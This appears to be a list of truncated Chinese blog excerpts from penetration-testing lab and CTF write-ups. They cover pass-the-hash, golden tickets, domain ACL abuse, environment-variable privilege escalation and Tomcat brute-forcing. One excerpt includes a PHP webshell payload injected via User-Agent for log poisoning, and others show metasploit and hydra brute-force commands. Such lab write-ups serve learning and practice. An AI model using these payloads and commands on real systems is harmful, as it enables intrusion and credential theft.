简介point 10Warm upDifficulty Easyrated by community INTERMEDIATE No more flimsy excuses 实验环境攻击者 Kali 192.168.45.200受害者 IP 192.168.200.220   Linux 1. 信息收集收集受...

实验环境攻击者 Kali 192.168.192.128受害者 IP 192.168.192.187 Linux 1. 信息收集如果不把域名放入/etc/hosts的话 那么就掉到兔子洞里了所以把这个写入/etc/hosts中访问weakness.jth/| __ / ...

1. 哈希传递哈希传递 (PtH) 技术允许攻击者使用用户的 NTLM 哈希而不是关联的明文密码来对远程系统或服务进行身份验证。请注意，这不适用于 Kerberos 身份验证，而仅适用于使用 NTLM 身份验证的...

目标IP 192.168.174.16当前有LFI漏洞 /meteor/index.php?page=且可以访问/var/log/access.log现在我们在User-Agent里插入php木马并运行<?php echo system($_GET['cmd']); ?>通过ps命令验...

任务• 在 dcorp 域中找到我们具有写入权限的计算机对象。• 滥用写入权限以域管理员身份访问该计算机。 Find-InterestingDomainAcl | ?{$_.identityreferencename -match 'ciadim'}空的 在Je...

1. 环境准备Vulnhub-DC2靶机一台 IP未知下载页面:https://www.vulnhub.com/entry/dc-2,311/kali 攻击者 IP 192.168.229.128VM网卡 NAT模式靶机和攻击机在同一网段 2. 信息收集2.1 靶机IP获取┌...

简介point 10LaVitaDifficulty INTERMEDIATErated by community HARD Part 7 of Labor Day CTF Machine 实验环境攻击者 Kali 192.168.45.209受害者 IP 192.168.181.38  Linux 1. 信息收集收...

1. 信息收集之环境变量提权-信息收集找到可以利用的环境变量shell变量的类型（1）本地变量【局部变量】（2）环境变量【全局变量】作用：设置系统和用户的工作环境环境变量是未在当前进程中定义...

当用户提交 TGT 请求时，KDC 使用只有域中的KDC 知道的密钥对 TGT 进行加密。该密钥实际上是名为 krbtgt 的域用户帐户的密码哈希。如果我们能够获得 krbtgt 密码哈希，我们就可以创建自己的自定...

需要输入用户名和密码 1. 密码爆破爆破方法有两个第一个 metasploitmsfconsole use auxiliary/scanner/http/tomcat_mgr_login show options set RHOSTS 10.10.10.95 run 第二个 hydrahydra -C...